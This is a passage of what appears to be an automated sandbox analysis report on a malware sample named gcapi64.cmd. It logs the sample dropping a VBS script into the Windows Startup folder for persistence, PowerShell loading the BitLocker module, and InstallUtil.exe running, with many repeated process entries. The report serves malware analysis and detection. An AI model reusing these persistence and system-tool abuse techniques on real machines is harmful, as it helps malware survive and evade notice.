                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbsJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbsJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
